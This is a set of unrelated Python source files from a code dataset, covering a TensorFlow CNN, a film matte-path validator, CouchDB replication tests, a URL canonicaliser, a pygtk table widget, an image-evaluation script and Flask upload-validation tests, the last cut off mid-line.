layers.fc_layer(pool5)\n fc1 = tf.nn.relu(fc1)\n fc1 = tf.nn.dropout(fc1, dropout_prob)\n print('[fc_1]:', fc1.get_shape().as_list())\n\n # [fc_2]\n fc2 = layers.fc_layer(fc1)\n fc2 = tf.nn.relu(fc2)\n fc2 = tf.nn.dropout(fc2, dropout_prob)\n print('[fc_2]:', fc2.get_shape().as_list())\n\n # [fc_3]\n fc3 = layers.fc_layer(fc2)\n fc3 = tf.nn.relu(fc3)\n fc3 = tf.nn.dropout(fc3, dropout_prob)\n print('[fc_1]:', fc3.get_shape().as_list())\n\n out = layers.fc_layer(fc3, softmax=True, out_dim=num_classes)\n print('[dense]:', out.get_shape().as_list())\n\n\nwith tf.variable_scope('Loss'):\n loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(labels=Y, logits=out))\n\n\ntrain = tf.train.AdamOptimizer(0.1).minimize(loss)\nsaver = tf.train.Saver()","sub_path":"CNN.py","file_name":"CNN.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"165282805","text":"#!/usr/bin/python\n\nimport re\nimport csv\nimport sys\nimport os\n\nimport matte_list_parser as mlp\nreload(mlp)\n\n\n\n\ndef parse_stereo_shotstring(shotstring, line = None):\n bits = shotstring.split('/') # split on slashes\n \n bit_dict ={}\n bit_dict['spool'] = bits[4]\n bit_dict['shotdir'] = bits[5]\n bit_dict['resolution']= bits[6]\n bit_dict['eye']= bits[7]\n bit_dict['file']= bits[8]\n \n bit_dict['file_eye'] = bit_dict['file'].split('_')[len(bit_dict['shotdir'].split('_'))-1]\n bit_dict['file_stereo_version'] = bit_dict['file'].split('_')[len(bit_dict['shotdir'].split('_'))].split('.')[0]\n bit_dict['extended_shotstring'] = '_'.join(bit_dict['shotdir'].split('_')[0:-1])\n bit_dict['stereo_version'] = bit_dict['shotdir'].split('_')[-1].split('.')[0]\n\n bit_dict['rawstring']=shotstring\n bit_dict['line'] = line\n return bit_dict\n\n\n\n\ndef parse_shotstring(shotstring, line = None):\n bits = shotstring.split('/') # split on slashes\n \n bit_dict ={}\n if bits[3].endswith('S3D'):\n if bits[4] == 'mono_base':\n bit_dict['vendor'] = 'MONO'\n else:\n bit_dict['vendor'] = 'S3D'\n elif bits[3].endswith('VFX'):\n bit_dict['vendor'] = 'VFX'\n else:\n bit_dict['vendor'] = 'UNKNOWN'\n \n\n if bit_dict['vendor'] == 'S3D':\n bit_dict['spool'] = bits[4]\n bit_dict['shotdir'] = bits[5]\n bit_dict['resolution']= bits[6]\n bit_dict['eye']= bits[7]\n bit_dict['matte'] = bits[8]\n bit_dict['file']= bits[9]\n bit_dict['file_stereo_version'] = bit_dict['file'].split('_')[-1]\n \n bit_dict['file_eye'] = bit_dict['file'].split('_')[len(bit_dict['shotdir'].split('_'))-1]\n bit_dict['file_stereo_version'] = bit_dict['file'].split('_')[len(bit_dict['shotdir'].split('_'))]\n bit_dict['extended_shotstring'] = '_'.join(bit_dict['shotdir'].split('_')[0:-1])\n bit_dict['stereo_version'] = bit_dict['shotdir'].split('_')[-1]\n\n \n \n elif bit_dict['vendor'] == 'VFX':\n bit_dict['spool'] = None\n bit_dict['shotdir'] = bits[4]\n bit_dict['resolution']= bits[5]\n bit_dict['eye']= bits[6]\n bit_dict['file']= bits[7]\n bit_dict['extended_shotstring'] = None\n bit_dict['stereo_version'] = None\n \n \n elif bit_dict['vendor'] == 'UNKNOWN':\n bit_dict['spool'] = None\n bit_dict['shotdir'] = bits[4]\n bit_dict['resolution']= bits[5]\n bit_dict['eye']= bits[6]\n bit_dict['file']= bits[7]\n \n elif bit_dict['vendor'] == 'MONO':\n bit_dict['spool'] = bits[4]\n bit_dict['shotdir'] = bits[5]\n bit_dict['resolution']= bits[6]\n bit_dict['eye']= None\n bit_dict['file']= bits[7]\n \n bit_dict['rawstring']= shotstring\n bit_dict['line'] = line\n return bit_dict\n\n \ndef validate_parse(the_dict, ignore_nontga = False):\n ''' internal test suite '''\n \n errors = []\n \n # check - TGAs? 
Flag if not.\n if the_dict['file'].split('.')[-1].lower() != 'tga' and not ignore_nontga:\n errors+= ['non-TGA extension']\n\n # check - file contains same eye as eyedir\n if the_dict['file_eye'] != the_dict['eye'][0] :\n errors+= ['file eye/dir eye mismatch ({fe} vs {e})'.format(fe=the_dict['file_eye'], e=the_dict['eye'])]\n \n # check - file is same as shotdir, matches on seq/shot/v/sp/opt/s/etc\n if not the_dict['file'].startswith(the_dict['extended_shotstring']):\n errors+= ['file shotstring/dir mismatch ({a} vs {b})'.format(a=the_dict['file'], b=the_dict['extended_shotstring'], ) ]\n \n if the_dict['file_stereo_version'] != the_dict['stereo_version']:\n errors+= ['file stereo ver/dir stereo ver mismatch ({eye}:{a} vs {b})'.format(a=the_dict['file_stereo_version'], eye =the_dict['eye'], b=the_dict['stereo_version'])]\n \n\n return errors\n \n \n\ndef check_mattepack(list_of_mattes):\n \n\n \n errors = []\n\n # if there are no mattes in use\n if len(list_of_mattes) == 0:\n errors+= ['no mattes in use']\n\n # if all mattes are of type VFX\n ven_list = []\n for v in list_of_mattes:\n ven_list += [v['vendor']]\n\n if 'UNKNOWN' in ven_list:\n errors += ['1:UNKNOWN/weirdly named matte in use']\n \n if 'VFX' in ven_list and 'S3D' not in ven_list:\n errors += ['2:only VFX mattes in use (no S3D)']\n \n if 'VFX' in ven_list and 'S3D' in ven_list:\n errors += ['1:S3D and VFX mixed mattes']\n\n # now do detailed matte level checking\n for matte in list_of_mattes:\n if matte['vendor'] == 'S3D':\n if matte['file_eye'] != matte['eye'][0]:\n errors+= ['0:file eye/dir eye mismatch ({a} vs {b}, line {line})'.format(line=matte['line'], a=matte['file_eye'], b=matte['eye'])]\n \n if matte['file'].split('.')[-1].lower() != 'tga':\n errors+= ['2:non-TGA extension (line {line})'.format(line=matte['line'])]\n \n # check - file is same as shotdir, matches on seq/shot/v/sp/opt/s/etc\n if not matte['file'].startswith(matte['extended_shotstring']):\n errors+= ['0:file shotstring/dir mismatch ({a} vs {b}, line {line})'.format(a=matte['file'], b= matte['extended_shotstring'], line=matte['line'])]\n \n if matte['file_stereo_version'] != matte['stereo_version']:\n errors+= ['0:file stereo ver/dir stereo ver mismatch ({a} vs {b},line {line})'.format(line=matte['line'], a=matte['file_stereo_version'],b= matte['stereo_version'] )]\n tmpset = []\n for matte in list_of_mattes:\n try:\n tmpset += [matte['extended_shotstring']]\n except KeyError:\n errors += ['1:UNKNOWN matte spotted']\n pass\n \n tmpset = list(set(tmpset))\n if len(tmpset) > 1:\n errors += [\"0:multiple matte versions in use ({a})\".format(a=str(tmpset))]\n \n # need to check for left and rightness.\n eyes = []\n for matte in list_of_mattes:\n eyes += [matte['eye']]\n if len(list_of_mattes) !=0:\n if 'left' not in eyes and 'right' not in eyes :\n errors += ['1:no eyes, but something found'] \n elif 'left' not in eyes or 'right' not in eyes:\n errors += ['0:only one eye']\n return errors","sub_path":"scripts/DI_matte_check/lib/spool_list_parser.py","file_name":"spool_list_parser.py","file_ext":"py","file_size_in_byte":6351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"450729935","text":"import random\nimport time\nfrom threading import Thread\nimport unittest\nfrom nose import tools\nimport uuid\nfrom testconfig import config\nfrom couchdbkit import client\nimport logger\n\nclass BasicTests(unittest.TestCase):\n\n nodes = []\n servers = []\n cleanup_dbs = []\n\n def setUp(self):\n self.log = logger.logger(\"basictests\")\n \n node_names = ['couchdb-local', 'couchdb-remote-1', 'couchdb-remote-2']\n for name in node_names:\n node = config[name]\n self.nodes.append(node)\n url = \"http://{0}:{1}/\".format(node['ip'], node['port'])\n server = client.Server(url, full_commit=False)\n self.servers.append(server)\n \n def tearDown(self):\n for db in self.cleanup_dbs:\n for server in self.servers:\n try:\n #pass\n server.delete_db(db)\n except Exception:\n pass\n\n #all_dbs = [db for db in self.server.all_dbs()]\n #for db in all_dbs:\n # if db.find(\"doctest\") != -1:\n # self.server.delete_db(db)\n self.cleanup_dbs = []\n\n def _get_db_name(self):\n name = \"doctests-{0}\".format(str(uuid.uuid4())[:6])\n self.cleanup_dbs.append(name)\n return name\n\n def _isodd(self, num):\n return num & 1 and True or False\n\n def _populate_database(self, server, server_ip, num_db, num_doc, num_attachment, first_only=False):\n text_attachment = \"a text attachment\"\n\n local_dbs = []\n for i in range(num_db):\n db_name = self._get_db_name()\n local_dbs.append(db_name)\n db = server.get_or_create_db(db_name)\n if i == 0 or not first_only:\n for j in range(num_doc):\n if self._isodd(j):\n doc = {\"_id\": str(j), \"a\": j, \"b\": str(uuid.uuid4())[:6], \"node\": server_ip, \"type\": \"odd\" }\n else:\n doc = {\"_id\": str(j), \"a\": j, \"b\": str(uuid.uuid4())[:6], \"node\": server_ip, \"type\": \"even\" }\n db.save_doc(doc)\n for k in range(num_attachment):\n db.put_attachment(doc, text_attachment, \"test_\" + str(k), \"text/plain\")\n\n return local_dbs\n\n def test_load_db(self):\n num_db = 10\n num_doc = 100\n num_attachment = 0\n self._popoluate_database(num_db, num_doc, num_attachment)\n\n def test_load_db_with_attachment(self):\n num_db = 10\n num_doc = 100\n num_attachment = 5\n self._popoluate_database(num_db, num_doc, num_attachment)\n \n def test_local_to_local(self):\n num_doc=5\n continuous = False\n local_dbs = self._populate_database(self.servers[0], self.nodes[0]['ip'], 2, num_doc, 5, True)\n url = \"http://{0}:{1}\".format(self.nodes[0]['ip'], self.nodes[0]['port']) + \"/\"\n source_url = url + local_dbs[0]\n target_url = url + local_dbs[1]\n self.servers[0].replicate(source_url, target_url, continuous=continuous, cancel=False, create_target=True)\n if not continuous: \n db = self.servers[0].get_or_create_db(local_dbs[1])\n result = db.all_docs()\n self.assertEqual(result.total_rows, num_doc)\n\n def _replicate_db(self, source_server, source_node, remote_node, local_db, continuous):\n source_url = \"http://{0}:{1}\".format(source_node['ip'], source_node['port']) + \"/\" + local_db\n target_url = \"http://{0}:{1}\".format(remote_node['ip'], remote_node['port']) + \"/\" + local_db\n source_server.replicate(source_url, target_url, continuous=continuous, cancel=False, create_target=True)\n\n def test_local_to_remote(self):\n num_doc=5\n continuous = False\n local_dbs = self._populate_database(self.servers[0], self.nodes[0]['ip'], 5, num_doc, 5, False)\n for db in local_dbs:\n for remote_node in self.nodes[1:]:\n replica = Thread(target=self._replicate_db, args=(self.servers[0], self.nodes[0], remote_node, db, continuous,))\n replica.start()\n 
replica.join()\n\n def test_local_to_local_with_attachment(self):\n num_doc=5\n continuous = False\n local_dbs = self._populate_database(self.servers[0], self.nodes[0]['ip'], 2, num_doc, 5, True)\n url = \"http://{0}:{1}\".format(self.nodes[0]['ip'], self.nodes[0]['port']) + \"/\"\n source_url = url + local_dbs[0]\n target_url = url + local_dbs[1]\n self.servers[0].replicate(source_url, target_url, continuous=continuous, cancel=False, create_target=True)\n if not continuous: \n db = self.servers[0].get_or_create_db(local_dbs[1])\n result = db.all_docs()\n self.assertEqual(result.total_rows, num_doc)\n\n def _filter(self, db_name):\n design_name = \"_design/test_filter\";\n design_doc = {\n \"_id\": design_name,\n \"language\": \"javascript\",\n \"filters\": {\n \"even\": \"\"\"function(doc, req) {\n if (doc.type && doc.type == \"even\") {\n return true;\n } else {\n return false;\n }\n}\"\"\"\n }\n }\n db = self.servers[0].get_or_create_db(db_name)\n if not db.doc_exist(design_name):\n db.save_doc(design_doc)\n\n def test_local_to_local_with_filter(self):\n num_doc=10\n continuous = False\n local_dbs = self._populate_database(self.servers[0], self.nodes[0]['ip'], 2, num_doc, 5, True)\n self._filter(local_dbs[0])\n url = \"http://{0}:{1}\".format(self.nodes[0]['ip'], self.nodes[0]['port']) + \"/\"\n source_url = url + local_dbs[0]\n target_url = url + local_dbs[1]\n self.servers[0].replicate(source_url, target_url, continuous=continuous, cancel=False, create_target=True, filter=\"test_filter/even\")\n if not continuous: \n db = self.servers[0].get_or_create_db(local_dbs[1])\n result = db.all_docs()\n self.assertEqual(result.total_rows, num_doc/2)\n\n def _compact_db(self, db_name):\n db = self.servers[0].get_or_create_db(db_name)\n db.compact()\n while (db.info()['compact_running'] == True) :\n time.sleep(1)\n\n def test_local_to_local_while_compacting(self):\n num_doc=5\n continuous = False\n local_dbs = self._populate_database(self.servers[0], self.nodes[0]['ip'], 2, num_doc, 0, True)\n\n compactor = Thread(target=self._compact_db, args=(local_dbs[0],))\n compactor.start()\n\n url = \"http://{0}:{1}\".format(self.nodes[0]['ip'], self.nodes[0]['port']) + \"/\"\n source_url = url + local_dbs[0]\n target_url = url + local_dbs[1]\n self.servers[0].replicate(source_url, target_url, continuous=continuous, cancel=False, create_target=True)\n if not continuous: \n db = self.servers[0].get_or_create_db(local_dbs[1])\n result = db.all_docs()\n self.assertEqual(result.total_rows, num_doc)\n compactor.join()\n\n def _random_doc(self, howmany=1):\n docs = []\n for i in range(howmany):\n id = \"crud_{0}\".format(i)\n k1 = \"a\"\n v1 = random.randint(0, 10000)\n k2 = \"b\"\n v2 = random.randint(0, 10000)\n if self._isodd(i):\n type = \"odd\" \n else:\n type = \"even\"\n #have random key-values here ?\n doc = {\"_id\": id, k1: v1, k2: v2, \"type\":type}\n docs.append(doc)\n return docs\n\n def _crud_db(self, db_name):\n num_doc = 10\n db = self.servers[0].get_or_create_db(db_name)\n docs = self._random_doc(num_doc)\n for doc in docs:\n db.save_doc(doc)\n \n for i in range(num_doc):\n fetched = db.get(\"crud_{0}\".format(i))\n fetched[\"c\"] = \"new field\"\n db.save_doc(fetched)\n \n #for doc in docs:\n # db.delete_doc(doc)\n \n\n def test_local_to_local_while_crud(self):\n num_doc=5\n continuous = False\n local_dbs = self._populate_database(self.servers[0], self.nodes[0]['ip'], 2, num_doc, 0, True)\n\n running = Thread(target=self._crud_db, args=(local_dbs[0],))\n running.start()\n\n url = 
\"http://{0}:{1}\".format(self.nodes[0]['ip'], self.nodes[0]['port']) + \"/\"\n source_url = url + local_dbs[0]\n target_url = url + local_dbs[1]\n self.servers[0].replicate(source_url, target_url, continuous=continuous, cancel=False, create_target=True)\n running.join()\n\n def test_local_to_local_with_filter_while_crud(self):\n num_doc=10\n continuous = False\n local_dbs = self._populate_database(self.servers[0], self.nodes[0]['ip'], 2, num_doc, 5, True)\n self._filter(local_dbs[0])\n\n running = Thread(target=self._crud_db, args=(local_dbs[0],))\n running.start()\n\n url = \"http://{0}:{1}\".format(self.nodes[0]['ip'], self.nodes[0]['port']) + \"/\"\n source_url = url + local_dbs[0]\n target_url = url + local_dbs[1]\n self.servers[0].replicate(source_url, target_url, continuous=continuous, cancel=False, create_target=True, filter=\"test_filter/even\")\n if not continuous: \n db = self.servers[0].get_or_create_db(local_dbs[1])\n result = db.all_docs()\n self.assertEqual(result.total_rows, num_doc)\n\n def test_local_circle(self):\n num_doc=5\n num_db=5\n continuous = False\n url = \"http://{0}:{1}\".format(self.nodes[0]['ip'], self.nodes[0]['port']) + \"/\"\n local_dbs = local_dbs = self._populate_database(self.servers[0], self.nodes[0]['ip'], num_db, num_doc, 0, True)\n for i in range(num_db):\n source_db = local_dbs[i]\n if i+1 >= num_db:\n target_db = local_dbs[0]\n else:\n target_db = local_dbs[i+1]\n self.servers[0].replicate(url+source_db, url+target_db, continuous=continuous, cancel=False, create_target=True)\n if not continuous:\n self.assertEqual(self.servers[0].get_or_create_db(source_db).all_docs().total_rows, \n self.servers[0].get_or_create_db(target_db).all_docs().total_rows)\n \n def test_local_to_remote_circle(self):\n num_db=5\n num_doc=5\n continuous = True\n local_dbs = self._populate_database(self.servers[0], self.nodes[0]['ip'], num_db, num_doc, 5, False)\n num_node = len(self.nodes)\n for i in range(num_node):\n if i+1 >= num_node:\n target_node = self.nodes[0]\n else:\n target_node = self.nodes[i+1]\n for db in local_dbs:\n replica = Thread(target=self._replicate_db, args=(self.servers[0], self.nodes[i], target_node, db, continuous,))\n replica.start()\n replica.join()\n\n def _trigger_replication(self, source_server, source_node, target_node, dbs, continuous):\n for db in dbs:\n replica = Thread(target=self._replicate_db, args=(source_server, source_node, target_node, db, continuous,))\n replica.start()\n replica.join()\n\n def test_two_way_replication(self):\n num_db=1\n num_doc=2\n continuous= True\n dbs = []\n for i in range(len(self.nodes)):\n local_dbs = self._populate_database(self.servers[i], self.nodes[i]['ip'], num_db, num_doc, 0, False)\n dbs.append(local_dbs)\n #a -><- b\n self._trigger_replication(self.servers[0], self.nodes[0], self.nodes[1], dbs[0], continuous)\n self._trigger_replication(self.servers[1], self.nodes[1], self.nodes[0], dbs[1], continuous)\n #a -><- c\n self._trigger_replication(self.servers[0], self.nodes[0], self.nodes[2], dbs[0], continuous)\n self._trigger_replication(self.servers[2], self.nodes[2], self.nodes[0], dbs[2], continuous)\n #b -><- c\n self._trigger_replication(self.servers[1], self.nodes[1], self.nodes[2], dbs[1], continuous)\n self._trigger_replication(self.servers[2], self.nodes[2], self.nodes[1], dbs[2], continuous)\n\n self.assertEqual(len(self.servers[1].all_dbs())-2, 3) # exclude default _replicator and _user db\n self.assertEqual(len(self.servers[2].all_dbs())-2, 3) # exclude default _replicator and _user db\n 
self.assertEqual(len(self.servers[0].all_dbs())-2, 3) # exclude default _replicator and _user db\n","sub_path":"src/replicate.py","file_name":"replicate.py","file_ext":"py","file_size_in_byte":12570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"106997471","text":"#!/usr/bin/python3\r\n# -*- coding: iso-8859-2 -*\r\n\r\nprint(\"Szukamy liczby sposobów, na jakie można pokryć planszę 4x4 identycznymi klockami 2x1.\")\r\n# Recursive function to find number of ways to fill a n x 4 matrix\r\n# with 1 x 4 tiles\r\ndef totalWays(n):\r\n\r\n\t# base cases\r\n\tif n < 1:\r\n\t\treturn 0\r\n\r\n\tif n < 2:\r\n\t\treturn 1\r\n\r\n\tif n == 2:\r\n\t\treturn 2\r\n\r\n\t# combine results of placing a tile horizontally and\r\n\t# placing 4 tiles vertically\r\n\treturn totalWays(n - 1) + totalWays(n - 2)\r\n\r\n\r\nn = 4\r\nprint(totalWays(n))\r\n","sub_path":"z13/kopia13_6.py","file_name":"kopia13_6.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"585283549","text":"'''\nCreated on Mar 31, 2015\n\n@author: ouyiqi\n'''\nimport urllib.parse\n\nclass URLProcessor:\n #canonicalize url\n def canonicalize(self, base, url):\n #lower case\n url = url.lower()\n parsed_url = urllib.parse.urlparse(url)\n #print(parsed_url)\n if parsed_url.scheme and parsed_url.scheme == 'http':\n #if has scheme:'http', get domain and remove port\n netloc = self.remove_port(parsed_url.netloc)\n url = urllib.parse.urlunparse((parsed_url.scheme,netloc,parsed_url.path, parsed_url.params,\n parsed_url.query, ''))\n elif parsed_url.scheme and parsed_url.scheme != 'http':\n #ignore other schemes\n return None\n elif not parsed_url.scheme:\n #if only has path, then get absolute path\n url = urllib.parse.urljoin(base, url, False)\n #remove duplicate slashes\n url = url[:7] + url[7:].replace('//', '/')\n return url\n \n def remove_port(self, netloc):\n i = netloc.find(':')\n if i >= 0:\n netloc = netloc[:i]\n return netloc\n \n #input url has should been canonicalized\n def get_domain_name(self, url):\n parsed_url = urllib.parse.urlparse(url)\n return '{url.scheme}://{url.netloc}'.format(url = parsed_url)\n \n\n\nif __name__ == \"__main__\":\n url1 = \"http://wWw.nbcnews.com//news/us-news/men-h你hello/123#hello\"\n url4 = \"#~news/us-news/men-h你hello/123#hello\"\n url2 = \"../hupu.com\"\n url3 = \"http://www.yahoo.com\"\n url_processor = URLProcessor()\n print(url_processor.get_domain_name(url_processor.canonicalize(url1, url2)))\n \n \n \n ","sub_path":"WebCrawler/url_process.py","file_name":"url_process.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"461818298","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport pygtk\n\npygtk.require(\"2.0\")\nimport gtk\nimport asking_program\nfrom tools import *\n\nclass AskingProgramWidget(gtk.VBox):\n def __init__(self, program):\n gtk.VBox.__init__(self)\n self.__program = program\n self.__type_model = gtk.ListStore(str)\n for i in asking_program.PROCESS_TYPES:\n self.__type_model.append([i])\n self.tv = self.__build_table(program)\n sw = gtk.ScrolledWindow()\n sw.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)\n self.pack_start(sw, True)\n sw.add(self.tv)\n self.show_all()\n\n def __build_table(self, program):\n tv = gtk.TreeView()\n tv.set_model(program)\n tv.set_search_column(asking_program.Column.CHANNEL)\n tv.get_selection().set_mode(gtk.SELECTION_MULTIPLE)\n tv.set_property(\"rubber-banding\", True)\n\n # канал\n cell = gtk.CellRendererText()\n column = gtk.TreeViewColumn(\"Канал\", cell,\n text=asking_program.Column.CHANNEL)\n tv.append_column(column)\n\n # конец программы\n cell = gtk.CellRendererToggle()\n cell.connect('toggled', self.__on_last_toggled)\n column = gtk.TreeViewColumn(None, cell,\n active=asking_program.Column.IS_LAST)\n column.set_widget(create_vertical_label(\"Конец программы\"))\n tv.append_column(column)\n\n # тип обработки\n cell = gtk.CellRendererCombo()\n cell.connect(\"changed\", self.__on_type_changed)\n cell.set_properties(model=self.__type_model,\n text_column=0,\n editable=True,\n has_entry=False)\n column = gtk.TreeViewColumn('Метод обработки', cell,\n text=asking_program.Column.TYPE,)\n tv.append_column(column)\n\n # логический адрес\n cell = gtk.CellRendererText()\n column = gtk.TreeViewColumn(None, cell,\n text=asking_program.Column.ADDRESS)\n column.set_widget(create_vertical_label(\"Логический адрес\"))\n cell.set_property(\"editable\", True)\n cell.connect(\"edited\", self.__on_address_edited)\n tv.append_column(column)\n\n # полный адрес\n cell = gtk.CellRendererText()\n column = gtk.TreeViewColumn(None, cell,\n text=asking_program.Column.RESULT)\n column.set_widget(create_vertical_label(\"Полный адрес\"))\n tv.append_column(column)\n\n # Коментарий\n cell = gtk.CellRendererText()\n column = gtk.TreeViewColumn(\"Автоматический комментарий\", cell,\n text=asking_program.Column.COMMENT)\n tv.append_column(column)\n\n return tv\n\n def __on_last_toggled(self, cell, path):\n # get toggled iter\n model = self.tv.get_model()\n i = model.get_iter((int(path),))\n fixed = model.get_value(i, asking_program.Column.IS_LAST)\n fixed = not fixed\n model.set(i, asking_program.Column.IS_LAST, fixed)\n\n self.__update_result(i)\n\n def __on_type_changed(self, widget, path, new_iter):\n model = self.tv.get_model()\n iterator = model.get_iter(path)\n model[path][asking_program.Column.TYPE] = self.__type_model[new_iter][0]\n self.__update_result(iterator)\n\n def __on_address_edited(self, cell, path, text):\n model = self.tv.get_model()\n iterator = model.get_iter(path)\n model[path][asking_program.Column.ADDRESS] = text\n self.__update_result(iterator)\n self.__update_comment(iterator)\n\n def __update_result(self, iterator):\n model = self.tv.get_model()\n channel, is_last, processing, address, result, comment = model[iterator]\n try:\n result = 1<<15 if is_last else 0\n result += asking_program.PROCESS_TYPES.index(processing) << 12\n result += int(address)\n except Exception:\n pass\n else:\n model[iterator][asking_program.Column.RESULT] = str(result)\n\n def __update_comment(self, iterator):\n model = self.tv.get_model()\n channel, 
is_last, processing, address, result, comment = model[iterator]\n comment = \"\"\n try:\n address = int(address)\n comment = self.__program.table.get_comment(address)\n except Exception:\n pass\n model[iterator][asking_program.Column.COMMENT] = comment","sub_path":"ppstmi/asking_program_widget.py","file_name":"asking_program_widget.py","file_ext":"py","file_size_in_byte":4712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"344293347","text":"# -*- coding: utf-8 -*-\r\nimport random\r\nimport os\r\nimport shutil\r\nfrom evalutor_my_bbox import Eval_thread\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\nfrom PIL import Image\r\nfrom skimage import data,filters\r\n\r\nimport numpy as np\r\n\r\ndataset_list = ['davis_test','Visal','Easy-35','VOS_test_png']\r\n\r\nfor sj in range(0,len(dataset_list)):\r\n\r\n dataset = dataset_list[sj]\r\n #\r\n fs_path = r'D:\\code\\new_5\\7_paste\\calss\\no_full/%s/'%(dataset)\r\n ms_path = r'D:\\dataset\\flo_s\\CPD_ms\\720_flo_CPD_VGG_fine_davis2000all_lr4_b10_49_bi/%s/'%(dataset)\r\n\r\n save_path = r'D:\\code\\new_5\\7_paste\\class_no_full_smeature_v/%s/'%(dataset)\r\n\r\n videos = os.listdir(fs_path)\r\n\r\n for i in range(0,len(videos)):\r\n #GT_object_level\r\n #ground-truth\r\n video=videos[i]\r\n pris_path = fs_path+video\r\n mss_path = ms_path+video\r\n pris=os.listdir(pris_path)\r\n\r\n if not os.path.exists(save_path+video):\r\n os.makedirs(save_path+video)\r\n\r\n length=len(pris)\r\n for a in range(0,length-1):\r\n\r\n pri=pris[a]\r\n\r\n pri_img_path=pris_path+'/'+pri\r\n ms_img_path=mss_path+'/'+pri\r\n\r\n if os.path.exists(pri_img_path):\r\n\r\n gt=cv2.imread(pri_img_path,0)\r\n gt = gt.astype(np.float32)\r\n gt=gt/255\r\n\r\n img_1=cv2.imread(ms_img_path,0)\r\n img_1 = img_1.astype(np.float32)\r\n img_1=img_1/255\r\n\r\n shape=gt.shape\r\n width=shape[1]\r\n hight=shape[0]\r\n\r\n img_1 =cv2.resize(img_1,(width,hight))\r\n\r\n w=Eval_thread(gt,img_1,True)\r\n w=round(w.run(),3)\r\n print(w)\r\n\r\n cv2.imwrite(save_path+video+'/'+pri[:-4]+'_'+str('%.3f'%(w))+'.png',gt*255)\r\n","sub_path":"Tools/s_measure_fs_ms.py","file_name":"s_measure_fs_ms.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"218253922","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n__author__ = 'g3n35i5'\n\nfrom shopdb.models import *\nfrom shopdb.api import app\nimport shopdb.exceptions as exc\nfrom tests.base_api import BaseAPITestCase\nfrom flask import json\nimport base64\nimport os\n\n\nclass UploadAPITestCase(BaseAPITestCase):\n def test_authorization(self):\n \"\"\"This route should only be available for admins.\"\"\"\n res = self.post(url='/upload', role=None)\n self.assertException(res, exc.UnauthorizedAccess)\n res = self.post(url='/upload', role='user')\n self.assertException(res, exc.UnauthorizedAccess)\n res = self.post(url='/upload', role='admin')\n self.assertException(res, exc.NoFileIncluded)\n self.assertEqual(len(Upload.query.all()), 0)\n\n def test_upload_no_file_included(self):\n \"\"\"A request without any data should raise an error.\"\"\"\n res = self.post(url='/upload', role='admin')\n self.assertException(res, exc.NoFileIncluded)\n self.assertEqual(len(Upload.query.all()), 0)\n\n def test_upload_empty_filename(self):\n \"\"\"A request with an empty filename should raise an error.\"\"\"\n image = {'value': base64.b64encode(b'abc').decode()}\n res = self.post(url='/upload', data=image, role='admin')\n self.assertException(res, exc.InvalidFilename)\n self.assertEqual(len(Upload.query.all()), 0)\n\n def test_upload_no_value_field(self):\n \"\"\"A request without a value should raise an error.\"\"\"\n image = {'filename': 'test.png'}\n res = self.post(url='/upload', data=image, role='admin')\n self.assertException(res, exc.NoFileIncluded)\n self.assertEqual(len(Upload.query.all()), 0)\n\n def test_upload_invalid_extension(self):\n \"\"\"A request with an invalid file extension should raise an error.\"\"\"\n image = {'filename': 'test.abc',\n 'value': base64.b64encode(b'abc').decode()}\n res = self.post(url='/upload', data=image, role='admin')\n self.assertException(res, exc.InvalidFileType)\n self.assertEqual(len(Upload.query.all()), 0)\n\n def test_upload_file_too_large(self):\n \"\"\"A request with an file which is too large should raise an error.\"\"\"\n bytes = b'1' * 6 * 1024 * 1024\n image = {'filename': 'test.png',\n 'value': base64.b64encode(bytes).decode()}\n res = self.post(url='/upload', data=image, role='admin')\n self.assertException(res, exc.FileTooLarge)\n self.assertEqual(len(Upload.query.all()), 0)\n\n def test_upload_invalid_filename(self):\n \"\"\"A request with an invalid file extension should raise an error.\"\"\"\n image = {'filename': '.abc', 'value': base64.b64encode(b'abc').decode()}\n res = self.post(url='/upload', data=image, role='admin')\n self.assertException(res, exc.InvalidFilename)\n self.assertEqual(len(Upload.query.all()), 0)\n\n def test_upload_broken_image(self):\n \"\"\"A request with a broken image should raise an error.\"\"\"\n filepath = app.config['UPLOAD_FOLDER'] + 'broken_image.png'\n with open(filepath, 'rb') as test:\n bytes = test.read()\n image = {'filename': 'broken.png',\n 'value': base64.b64encode(bytes).decode()}\n res = self.post(url='/upload', data=image, role='admin')\n self.assertException(res, exc.BrokenImage)\n self.assertEqual(len(Upload.query.all()), 0)\n\n def test_invalid_filetype_hidden_behind_valid_filename(self):\n \"\"\"A request an invalid file type should raise an error.\"\"\"\n filepath = app.config['UPLOAD_FOLDER'] + 'valid_image.jpg'\n with open(filepath, 'rb') as test:\n bytes = test.read()\n image = {'filename': 'hidden_invalid_filetype.png',\n 'value': base64.b64encode(bytes).decode()}\n res = 
